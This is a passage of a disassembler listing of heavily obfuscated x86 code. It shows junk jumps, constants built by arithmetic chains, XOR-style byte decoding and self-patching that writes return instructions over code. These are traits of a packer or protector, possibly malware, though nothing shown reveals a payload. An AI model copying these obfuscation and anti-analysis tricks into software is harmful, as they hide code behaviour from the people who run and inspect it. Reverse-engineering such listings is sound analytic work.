; START OF FUNCTION CHUNK FOR sub_441AED
loc_459CC6: ; CODE XREF: sub_441AED:loc_44CC7Aj
xor eax, 0AB0C9E70h
add eax, 91E21130h
mov eax, [eax]
or eax, eax
jnz loc_441FA2
jmp loc_4433F8
; END OF FUNCTION CHUNK FOR sub_441AED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_459CE1: ; CODE XREF: sub_452B14:loc_439772j
; DATA XREF: sub_443BD9+F615o
pop edi
mov eax, [ebp-4]
call sub_444273
loc_459CEA: ; CODE XREF: sub_4575F9+10j
jmp loc_440EC8
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D688
loc_459CEF: ; CODE XREF: sub_43D688+14D7Aj
jmp nullsub_21
; END OF FUNCTION CHUNK FOR sub_43D688
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_459CF4: ; CODE XREF: sub_4508DB:loc_453327j
add eax, 20E7682h
mov eax, [eax]
mov al, [eax]
jo loc_44E05F
sub al, 99h
mov edx, [ebp+var_4]
jmp loc_43C9C9
; END OF FUNCTION CHUNK FOR sub_4508DB
; =============== S U B R O U T I N E =======================================
sub_459D0E proc near ; DATA XREF: sub_44081E+17178o
; FUNCTION CHUNK AT 00439CB7 SIZE 00000005 BYTES
xor [ebp-0Ah], al
inc dword ptr [ebp-8]
inc dword ptr [ebp-4]
jmp loc_439CB7
sub_459D0E endp
; =============== S U B R O U T I N E =======================================
sub_459D1C proc near ; CODE XREF: sub_440CEC:loc_45AB18p
; FUNCTION CHUNK AT 00458964 SIZE 00000005 BYTES
push offset loc_43BA4E
jmp loc_458964
sub_459D1C endp
; ---------------------------------------------------------------------------
loc_459D26: ; CODE XREF: ut7h7i2x:0044EB49j
jg loc_452067
jmp loc_441EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_459D31: ; CODE XREF: sub_445E9E-5931j
push offset sub_45ADF0
jmp loc_45454B
; END OF FUNCTION CHUNK FOR sub_445E9E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_328. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44022F
loc_459D3C: ; CODE XREF: sub_44022F+Cj
jmp loc_448A92
; END OF FUNCTION CHUNK FOR sub_44022F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_459D41: ; CODE XREF: sub_4589C7-18DA5j
rol edi, 3
xor edi, 184A11D7h
popf
adc ecx, edi
pop edi
xchg ebp, [esp+0]
jmp loc_4517F9
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
popf
jmp loc_451F33
; ---------------------------------------------------------------------------
loc_459D5C: ; DATA XREF: ut7h7i2x:00455FB8o
call sub_43DA21
push 605EED78h
mov eax, 16D7F999h
jmp loc_43DD45
; ---------------------------------------------------------------------------
or ecx, edi
xchg edi, [edx]
jmp sub_439170
; ---------------------------------------------------------------------------
loc_459D79: ; CODE XREF: ut7h7i2x:0045424Dj
cmp ecx, 0FFA1F1EBh
jmp loc_4579A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_459D84: ; CODE XREF: sub_446F9A+D1EBj
jb loc_4417D6
sbb ecx, eax
loc_459D8C: ; CODE XREF: sub_446F9A:loc_45A6D0j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_45844A
jmp loc_452E28
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
loc_459D9D: ; CODE XREF: ut7h7i2x:0044FD81j
not eax
; =============== S U B R O U T I N E =======================================
sub_459D9F proc near ; CODE XREF: ut7h7i2x:00439334p
; FUNCTION CHUNK AT 0044E1BF SIZE 00000025 BYTES
xchg ecx, [esp+0]
pop ecx
push edx
jmp loc_44E1BF
sub_459D9F endp
; ---------------------------------------------------------------------------
loc_459DA9: ; CODE XREF: ut7h7i2x:00448372j
jno loc_43BE72
or eax, ebp
js loc_450800
jmp loc_451E65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_459DBC: ; CODE XREF: sub_457A66:loc_44D7F4j
sub al, 99h
mov edx, [ebp+var_4]
loc_459DC1: ; CODE XREF: ut7h7i2x:004590F7j
imul byte ptr [edx]
jmp loc_441E16
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458937
loc_459DC8: ; CODE XREF: sub_458937-F602j
add ecx, 4DB37039h
xchg ecx, [esp+0]
jmp loc_4567AE
; END OF FUNCTION CHUNK FOR sub_458937
; ---------------------------------------------------------------------------
loc_459DD6: ; CODE XREF: ut7h7i2x:0045366Aj
jnz loc_442BC6
jmp loc_43ECE2
; ---------------------------------------------------------------------------
loc_459DE1: ; CODE XREF: ut7h7i2x:0044835Cj
or ebp, 6537225Dh
; =============== S U B R O U T I N E =======================================
sub_459DE7 proc near ; CODE XREF: sub_459FAF-1BA00p
; FUNCTION CHUNK AT 0043A330 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AF25 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441F69 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004469A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447591 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447FFB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B30B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ECCE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004585EC SIZE 00000007 BYTES
xchg esi, [esp+0]
pop esi
or eax, eax
jmp loc_43A330
sub_459DE7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43964B
loc_459DF2: ; CODE XREF: sub_43964B:loc_43E482j
push 4DF00D05h
pop esi
rol esi, 12h
or esi, 555EB13Bh
add esi, 8AE47B4Eh
xchg esi, [esp+0]
jmp loc_43A8D8
; END OF FUNCTION CHUNK FOR sub_43964B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446490
loc_459E0F: ; CODE XREF: sub_446490+Aj
mov eax, [esp-8+arg_4]
push edx
call sub_449D3B
mov eax, 78BDA40Ah
push edx
push 1BDBADB0h
; END OF FUNCTION CHUNK FOR sub_446490
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_459E23: ; CODE XREF: sub_44B5CF:loc_4579FEj
pop edx
jmp loc_44B859
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_459E29: ; CODE XREF: sub_4402A5:loc_4390AAj
or ecx, ebp
jmp loc_45547F
; END OF FUNCTION CHUNK FOR sub_4402A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_387. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4566A1
loc_459E31: ; CODE XREF: sub_4566A1+8j
jmp loc_43C906
; END OF FUNCTION CHUNK FOR sub_4566A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FFC
loc_459E36: ; CODE XREF: sub_449FFC:loc_43EFFBj
or edx, 92BBF991h
xor edx, 0F20451F8h
add edx, 5D1CB25Bh
push offset loc_4426E0
jmp nullsub_410
; END OF FUNCTION CHUNK FOR sub_449FFC
; ---------------------------------------------------------------------------
loc_459E52: ; CODE XREF: ut7h7i2x:0044240Aj
or ebp, edi
; =============== S U B R O U T I N E =======================================
sub_459E54 proc near ; CODE XREF: ut7h7i2x:0044654Dp
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043A4C4 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043B8F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D160 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442E5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444D59 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00447A5D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044CD36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FD86 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004566AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458EF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004594A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004598E7 SIZE 00000020 BYTES
xchg edi, [esp+0]
pop edi
push edx
mov edx, eax
xchg edx, [esp+0]
push eax
loc_459E5F: ; CODE XREF: ut7h7i2x:0044FB80j
jmp loc_44FD86
sub_459E54 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_459E64: ; CODE XREF: ut7h7i2x:loc_44152Bj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_459E65: ; CODE XREF: sub_45A070+16j
jmp loc_43D604
; END OF FUNCTION CHUNK FOR sub_45A070
; ---------------------------------------------------------------------------
mov edx, [edi]
shr eax, 19h
jmp sub_443E2D
; ---------------------------------------------------------------------------
loc_459E74: ; CODE XREF: ut7h7i2x:0043D917j
jno loc_447A99
; =============== S U B R O U T I N E =======================================
sub_459E7A proc near ; CODE XREF: sub_43A5C0:loc_43D93Ep
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439D73 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443D4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044434C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445973 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E181 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454BE6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458D8B SIZE 00000019 BYTES
xchg esi, [esp+0]
pop esi
sub eax, 0D379B617h
jmp loc_44E181
sub_459E7A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_459E89: ; CODE XREF: sub_43C0DA+163EAj
push ecx
push 47177A91h
loc_459E8F: ; CODE XREF: ut7h7i2x:0043AE0Ej
pop ecx
or ecx, 0A063DEFAh
cmp ecx, 0ECBFC2Dh
jmp loc_449CCA
; END OF FUNCTION CHUNK FOR sub_43C0DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_428. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_459EA2: ; CODE XREF: sub_444029:loc_440529j
jmp loc_43B68A
; END OF FUNCTION CHUNK FOR sub_444029
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_312. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A33F
loc_459EA8: ; CODE XREF: sub_44A33F-826Ej
jmp loc_43A0B7
; END OF FUNCTION CHUNK FOR sub_44A33F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E65D
loc_459EAD: ; CODE XREF: sub_44E65D+8j
jno loc_445DD6
push offset sub_455111
jmp nullsub_412
; END OF FUNCTION CHUNK FOR sub_44E65D
; ---------------------------------------------------------------------------
loc_459EBD: ; CODE XREF: ut7h7i2x:004553E6j
shr esi, 0Bh
pop edi
push ecx
loc_459EC2: ; CODE XREF: ut7h7i2x:004553CEj
xor eax, 0EF0473E6h
jmp loc_446A5B
; ---------------------------------------------------------------------------
loc_459ECD: ; DATA XREF: sub_4395FB+107BFo
add eax, ebp
add eax, 19C4968Ch
push offset sub_44C92B
jmp loc_4489BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_459EDF: ; CODE XREF: sub_439BF8+1E61Fj
pop eax
and eax, 0E2D7DF69h
add eax, 0C852D637h
add eax, ebp
add eax, 359BA555h
mov eax, [eax]
popf
mov ecx, 3FDh
jmp loc_441FD1
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
add ebp, 513945B0h
adc ecx, eax
jmp sub_43CE34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_459F0E: ; CODE XREF: sub_439BF8:loc_448208j
jge loc_44C286
loc_459F14: ; CODE XREF: sub_44BE82+18j
jmp loc_456C44
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_459F19: ; CODE XREF: ut7h7i2x:0043E417j
jmp loc_43C8E5
; ---------------------------------------------------------------------------
test ebp, ebx
jmp loc_44BC06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459B2
loc_459F25: ; CODE XREF: sub_4459B2+5j
jmp ds:off_41D118
; END OF FUNCTION CHUNK FOR sub_4459B2
; ---------------------------------------------------------------------------
loc_459F2B: ; CODE XREF: ut7h7i2x:00446E5Fj
jmp loc_447D79
; =============== S U B R O U T I N E =======================================
sub_459F30 proc near ; CODE XREF: sub_4459B2p
; sub_440E5F+686Cj ...
; FUNCTION CHUNK AT 00439339 SIZE 00000005 BYTES
xchg ebp, [esp+0]
mov edx, ebp
loc_459F35: ; CODE XREF: sub_440944+1A0A2j
push offset sub_440E5F
jmp loc_439339
sub_459F30 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_459F3F: ; CODE XREF: sub_446F56+58DFj
and ebx, 8E4949FAh
loc_459F45: ; CODE XREF: sub_446F56:loc_449491j
push esi
call sub_456923
loc_459F4B: ; CODE XREF: sub_452F03:loc_45595Cj
add ebx, 77A04B7h
xchg ebx, [esp-4+arg_0]
jmp loc_446314
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
mov eax, 0BEB860A6h
push offset sub_45035B
jmp locret_45A826
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_459F68: ; CODE XREF: sub_43F1B2+16B8j
ror eax, 4
not ecx
loc_459F6D: ; CODE XREF: sub_43F1B2:loc_44085Ej
add eax, 0E737C38h
cmp eax, 8B0C0C96h
jmp loc_447500
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BB85
loc_459F7E: ; CODE XREF: sub_43BB85:loc_43CE12j
mov edi, eax
xchg edi, [esp+0]
call sub_44933B
loc_459F88: ; CODE XREF: sub_44FC60+14j
jmp sub_440A88
; END OF FUNCTION CHUNK FOR sub_43BB85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457FD0
loc_459F8D: ; CODE XREF: sub_457FD0-122C1j
jmp loc_43EFB4
; END OF FUNCTION CHUNK FOR sub_457FD0
; ---------------------------------------------------------------------------
loc_459F92: ; CODE XREF: ut7h7i2x:0043A357j
cmp ecx, esi
jmp loc_445F49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445048
loc_459F99: ; CODE XREF: sub_445048:loc_44A890j
mov [ebx], eax
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_445048
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_459F9D: ; CODE XREF: sub_459B58-1CAC6j
jmp loc_448BC4
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_459FA2: ; CODE XREF: sub_439BD1+4A6Aj
rol eax, 12h
push offset sub_452C71
jmp loc_446634
; END OF FUNCTION CHUNK FOR sub_439BD1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_459FAF proc near ; DATA XREF: sub_440493:loc_43A0F1o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043E5A9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C7A2 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00459574 SIZE 00000005 BYTES
mov ebp, esp
push ebx
mov ebx, ecx
xchg ebx, [esp+0]
mov esp, ebp
pop ebp
jmp loc_459574
sub_459FAF endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_441. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_459FC0: ; CODE XREF: sub_449B8E+14j
jmp loc_4413B3
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
loc_459FC5: ; CODE XREF: ut7h7i2x:00443E59j
jmp loc_43F043
; ---------------------------------------------------------------------------
loc_459FCA: ; DATA XREF: sub_4596FF+4o
call sub_455807
mov eax, 0F074E076h
call sub_43AA94
push offset sub_43A990
jmp locret_44BCC0
; ---------------------------------------------------------------------------
loc_459FE3: ; CODE XREF: ut7h7i2x:0044C826j
jo sub_4543E9
; =============== S U B R O U T I N E =======================================
sub_459FE9 proc near ; CODE XREF: sub_449E96+6E1Fp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044312F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C3AF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045761A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459CA2 SIZE 0000001E BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-4]
mov al, [eax]
jb loc_44C3AF
jmp loc_454FF9
sub_459FE9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_459FFD: ; CODE XREF: sub_4503C3:loc_439D8Fj
jnz loc_443AA9
jmp loc_4576D8
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
cmp eax, 57335A16h
jmp loc_441014
; ---------------------------------------------------------------------------
mov ds:off_41D200, eax
lea eax, sub_444A08
mov byte ptr [eax], 0C3h
jmp loc_43A7C8
; =============== S U B R O U T I N E =======================================
sub_45A027 proc near ; CODE XREF: sub_41946E+C8p
; ut7h7i2x:004450EBj
; DATA XREF: ...
push offset loc_4450E6
jmp nullsub_417
sub_45A027 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_45A031: ; CODE XREF: sub_43DD17+48C7j
jz loc_448006
loc_45A037: ; CODE XREF: sub_43DD17:loc_43BDE5j
xor eax, 0D42F31E6h
push edx
pushf
push 8DD49277h
pop edx
or edx, ds:4000F8h
jmp loc_441EF1
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_45A050: ; CODE XREF: sub_44C852:loc_43DDCEj
jge loc_45A3CF
loc_45A056: ; CODE XREF: ut7h7i2x:loc_439BA5j
not ecx
sub esi, edi
jz loc_4486F9
jmp loc_45A3CF
; END OF FUNCTION CHUNK FOR sub_44C852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_45A065: ; CODE XREF: sub_43A556:loc_44FF11j
jnz loc_43EE42
jmp loc_44290B
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_45A070 proc near ; DATA XREF: sub_43A556+12B7Ao
; FUNCTION CHUNK AT 00439E20 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00439F67 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043D604 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446755 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004472CE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448B90 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045291E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045863B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458B71 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459E65 SIZE 00000005 BYTES
push 0FFFFFFFFh
lea eax, [ebp-800h]
push eax
call sub_449E59
test eax, eax
jz loc_45863B
jmp loc_459E65
sub_45A070 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_45A08B: ; CODE XREF: sub_454B2B:loc_44E213j
push 0A8954848h
pop eax
rol eax, 1Dh
sub eax, 65DF35AEh
or eax, 8D5E671Dh
jmp loc_439BEE
; END OF FUNCTION CHUNK FOR sub_454B2B
; =============== S U B R O U T I N E =======================================
sub_45A0A5 proc near ; DATA XREF: ut7h7i2x:0044E6D6o
; FUNCTION CHUNK AT 0043DC77 SIZE 0000000D BYTES
push 830D9C0Fh
pop edi
xor edi, 4DF6323h
and edi, 8C510FF4h
rol edi, 13h
jmp loc_43DC77
sub_45A0A5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_45A0BF: ; CODE XREF: sub_44CAB9+A1FFj
jl loc_43E4DB
loc_45A0C5: ; CODE XREF: sub_44CAB9:loc_440283j
call sub_453D8B
mov edx, 8D40711Dh
push ebx
push 0B3E768F8h
pop ebx
rol ebx, 13h
add ebx, 0B87F0163h
jmp loc_452F58
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45459E
loc_45A0E4: ; CODE XREF: sub_45459E:loc_457C12j
call sub_4589FE
push offset sub_451759
jmp nullsub_420
; END OF FUNCTION CHUNK FOR sub_45459E
; ---------------------------------------------------------------------------
loc_45A0F3: ; CODE XREF: ut7h7i2x:004502A8j
pop ebx
xor ebx, 87B6108Fh
js loc_451C31
; START OF FUNCTION CHUNK FOR sub_44F22A
loc_45A100: ; CODE XREF: sub_44F22A+1j
jmp loc_43D8A2
; END OF FUNCTION CHUNK FOR sub_44F22A
; ---------------------------------------------------------------------------
loc_45A105: ; CODE XREF: ut7h7i2x:0044A4A9j
jmp loc_452BB1
; ---------------------------------------------------------------------------
loc_45A10A: ; CODE XREF: ut7h7i2x:004466FBj
jmp loc_45A4BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_45A10F: ; CODE XREF: sub_449700-9E18j
jmp sub_450087
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
cmp ebp, 45314521h
jmp loc_442053
; ---------------------------------------------------------------------------
loc_45A11F: ; CODE XREF: ut7h7i2x:loc_458E6Ej
rol edx, 17h
and edx, 68F204E9h
sub edx, 0AB580066h
add edx, 9DB2B9B5h
call sub_44ED9F
call sub_43B5B0
; START OF FUNCTION CHUNK FOR sub_455807
loc_45A13E: ; CODE XREF: sub_455807-8230j
jmp loc_43AFFD
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B87B
loc_45A143: ; CODE XREF: sub_44B87B+9j
jmp loc_44F637
; END OF FUNCTION CHUNK FOR sub_44B87B
; ---------------------------------------------------------------------------
push 0D4F02BDh
pop eax
sub eax, 0E59F989Ch
and eax, 0BE96694Bh
add eax, 6C2130AEh
call sub_43AA94
push esi
push 4CA346B8h
jmp loc_441ECC
; ---------------------------------------------------------------------------
mov [edi], eax
jmp loc_44C748
; ---------------------------------------------------------------------------
db 3
dd 158A0FEBh, 0E9FFFF96h, 884h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_344. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_45A185: ; CODE XREF: sub_43B5D4:loc_44484Cj
push 4870583Ch
pop ebx
or ebx, 0B1F76801h
and ebx, 0DD80383Bh
add ebx, 70449904h
jmp loc_448648
; END OF FUNCTION CHUNK FOR sub_43B5D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DE22
loc_45A1A2: ; CODE XREF: sub_43DE22+1128Aj
jge loc_44510C
; END OF FUNCTION CHUNK FOR sub_43DE22
; START OF FUNCTION CHUNK FOR sub_449E96
loc_45A1A8: ; CODE XREF: sub_449E96-62FCj
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
xchg edx, [eax]
sub edx, 76DDB1F7h
jnb sub_458937
popf
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_45A1BC: ; CODE XREF: sub_443BC5+11F4Ej
cmp eax, edi
jmp loc_445106
; END OF FUNCTION CHUNK FOR sub_443BC5
; =============== S U B R O U T I N E =======================================
sub_45A1C3 proc near ; CODE XREF: ut7h7i2x:0043E78Cj
; sub_44B45E+8A34p
xchg ebx, [esp+0]
pop ebx
mov byte ptr [eax], 0C3h
jmp nullsub_22
sub_45A1C3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45A1CF: ; CODE XREF: ut7h7i2x:00455581j
mov eax, [esp]
call sub_445822
loc_45A1D7: ; CODE XREF: ut7h7i2x:004551A8j
jmp loc_450AEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_45A1DC: ; CODE XREF: sub_449E96+4DAj
jmp loc_43FE7C
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FF0
loc_45A1E1: ; CODE XREF: sub_449FF0:loc_444B0Fj
xchg edx, [esp+4+var_4]
jmp loc_450BD5
; END OF FUNCTION CHUNK FOR sub_449FF0
; =============== S U B R O U T I N E =======================================
sub_45A1E9 proc near ; DATA XREF: sub_4490E0+D708o
push eax
mov eax, edx
push offset sub_459935
jmp nullsub_521
sub_45A1E9 endp
; ---------------------------------------------------------------------------
loc_45A1F6: ; CODE XREF: ut7h7i2x:loc_44714Fj
jnz loc_4540EA
jmp loc_457C6F
; ---------------------------------------------------------------------------
loc_45A201: ; CODE XREF: ut7h7i2x:0043989Aj
jnp loc_4516B0
sub esi, 0F3093C07h
; =============== S U B R O U T I N E =======================================
sub_45A20D proc near ; CODE XREF: sub_44A0CE+6EAAp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00444BCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456EBB SIZE 00000015 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
push edi
push 0DB5A23E3h
jmp loc_456EBB
sub_45A20D endp
; ---------------------------------------------------------------------------
loc_45A21F: ; CODE XREF: ut7h7i2x:0044DA89j
test ecx, eax
jmp loc_444D04
; ---------------------------------------------------------------------------
cdq
jmp sub_449B57
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_485. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_45A22D: ; CODE XREF: sub_43A556+5D0Cj
jmp loc_44117E
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_45A232: ; CODE XREF: ut7h7i2x:00440ADEj
mov byte ptr [eax], 0C3h
jmp loc_43D345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_45A23A: ; CODE XREF: sub_442E76j
pop edx
mov eax, [esp+4+var_4]
call sub_447185
loc_45A243: ; CODE XREF: ut7h7i2x:loc_45A6AFj
sub al, 99h
push 0F55D9F66h
pop edx
sub edx, 5CB98D27h
and edx, 4F5F5A07h
jmp loc_441862
; END OF FUNCTION CHUNK FOR sub_442E76
; =============== S U B R O U T I N E =======================================
sub_45A25C proc near ; DATA XREF: sub_459E7A-10E0o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BDC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446E82 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044969E SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0044C77D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EA42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045309E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045584F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004579CF SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00457A70 SIZE 00000005 BYTES
pop edi
xor eax, 167BADEFh
push ecx
push 92A8D261h
pop ecx
add ecx, 0F08850CBh
rol ecx, 3
test ecx, 10000000h
jmp loc_457A70
sub_45A25C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_272. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_45A27F: ; CODE XREF: sub_44064B-C3Fj
jmp loc_45246C
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
mov eax, 5A4FBBBh
push edx
push 0CABC54D6h
pop edx
jmp loc_44DE9B
; ---------------------------------------------------------------------------
locret_45A295: ; CODE XREF: ut7h7i2x:loc_44A143j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_45A296: ; CODE XREF: sub_456F1D-12FC2j
jmp loc_44BBC1
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_45A29B: ; CODE XREF: sub_44F943:loc_4432A7j
jmp loc_452DD2
; END OF FUNCTION CHUNK FOR sub_44F943
; ---------------------------------------------------------------------------
not esi
or ebx, edx
jmp sub_4446B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_45A2A9: ; CODE XREF: sub_4445DC:loc_445209j
mov esp, ebp
pop ebp
retn
